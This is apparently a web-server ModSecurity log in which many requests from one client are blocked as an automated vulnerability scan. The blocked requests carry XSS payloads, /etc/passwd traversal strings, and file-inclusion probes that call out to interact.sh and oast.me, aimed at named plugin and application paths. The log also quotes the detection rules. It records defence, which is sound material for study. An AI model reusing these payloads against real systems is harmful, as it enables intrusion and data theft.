[Tue Aug 29 11:55:05.749241 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' accesskey='x' onclick='alert(document.domain)' class='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KcCo-f0AAApa-LcAAAAg"]
[Tue Aug 29 11:55:05.975555 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO16KcCo-f0AAApa-LoAAAAg"]
[Tue Aug 29 11:55:06.638326 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:img. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:img: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/components/com_rwcards/captcha/captcha_image.php"] [unique_id "ZO16KsCo-f0AAAqTvnwAAAAa"]
[Tue Aug 29 11:55:08.546789 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16LMCo-f0AAApXgmIAAAAU"]
[Tue Aug 29 11:55:11.699579 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:arr_ajax_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: gnuboard<svg found within ARGS:arr_ajax_msg: gnuboard<svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/plugin/sms5/ajax.sms_emoticon.php"] [unique_id "ZO16L8Co-f0AAAqY6AAAAAAr"]
[Tue Aug 29 11:55:11.879876 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin"] [unique_id "ZO16L8Co-f0AAApHRegAAAAP"]
[Tue Aug 29 11:55:12.607083 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/email_passthrough.php"] [unique_id "ZO16MMCo-f0AAAqY6AcAAAAr"]
[Tue Aug 29 11:55:14.581140 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/boafrm/formWlanRedirect"] [unique_id "ZO16MsCo-f0AAAoz8DoAAAAS"]
[Tue Aug 29 11:55:14.670253 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:form_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:form_id: xxxxxx\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16MsCo-f0AAApOdi4AAAAL"]
[Tue Aug 29 11:55:16.899536 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:query[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:query[]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16NMCo-f0AAAqY6B8AAAAr"]
[Tue Aug 29 11:55:16.924555 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:note. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:note: </textarea><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/payform.php"] [unique_id "ZO16NMCo-f0AAAqY6CAAAAAr"]
[Tue Aug 29 11:55:17.583824 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/flexible-custom-post-type/edit-post.php"] [unique_id "ZO16NcCo-f0AAAqw504AAAAH"]
[Tue Aug 29 11:55:17.675471 2023] [:error] [pid 2735] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/tiki-featured_link.php"] [unique_id "ZO16NcCo-f0AAAqvjm0AAAAE"]
[Tue Aug 29 11:55:18.676288 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:msg: &#<svg/onload=alert(1337)>;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/message"] [unique_id "ZO16NsCo-f0AAAqY6DQAAAAr"]
[Tue Aug 29 11:55:19.576498 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf found within ARGS:wp-submit: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16N8Co-f0AAApXgn8AAAAU"]
[Tue Aug 29 11:55:19.799800 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errmsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:errmsg: ABABAB--><script>alert(1337)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/remote/error"] [unique_id "ZO16N8Co-f0AAApbUe4AAAAh"]
[Tue Aug 29 11:55:20.552829 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:playlist. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:playlist: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/hdw-tube/playlist.php"] [unique_id "ZO16OMCo-f0AAApbUfAAAAAh"]
[Tue Aug 29 11:55:22.532610 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:q: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/templates/m/inc_head.php"] [unique_id "ZO16OsCo-f0AAAqeFUgAAAAx"]
[Tue Aug 29 11:55:22.628569 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO16OsCo-f0AAAqqtd4AAAAA"]
[Tue Aug 29 11:55:23.555094 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:url: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZO16O8Co-f0AAAqqteYAAAAA"]
[Tue Aug 29 11:55:23.823463 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:log: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO16O8Co-f0AAAolKnMAAAAe"]
[Tue Aug 29 11:55:24.086372 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/atmail/"] [unique_id "ZO16PMCo-f0AAAqqte4AAAAA"]
[Tue Aug 29 11:55:24.563482 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/atmail/webmail/"] [unique_id "ZO16PMCo-f0AAApa-OsAAAAg"]
[Tue Aug 29 11:55:24.711505 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:operation. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:operation: 11111111</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet"] [unique_id "ZO16PMCo-f0AAAolKoMAAAAe"]
[Tue Aug 29 11:55:25.755974 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:language: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO16PcCo-f0AAApa-PIAAAAg"]
[Tue Aug 29 11:55:25.756989 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:fccc'\\\\"><svg/onload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: < found within ARGS_NAMES:fccc'\\x5c\\x5c\\x22><svg/onload: fccc'\\x5c\\x22><svg/onload"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/webapp/"] [unique_id "ZO16PcCo-f0AAAqSwtIAAAAN"]
[Tue Aug 29 11:55:26.723814 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:q: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/search/"] [unique_id "ZO16PsCo-f0AAAqsV7kAAAAB"]
[Tue Aug 29 11:55:28.537729 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:type: ../../../../../../../../../../../etc/./passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/horde/util/barcode.php"] [unique_id "ZO16QMCo-f0AAAqqtgIAAAAA"]
[Tue Aug 29 11:55:29.855869 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy 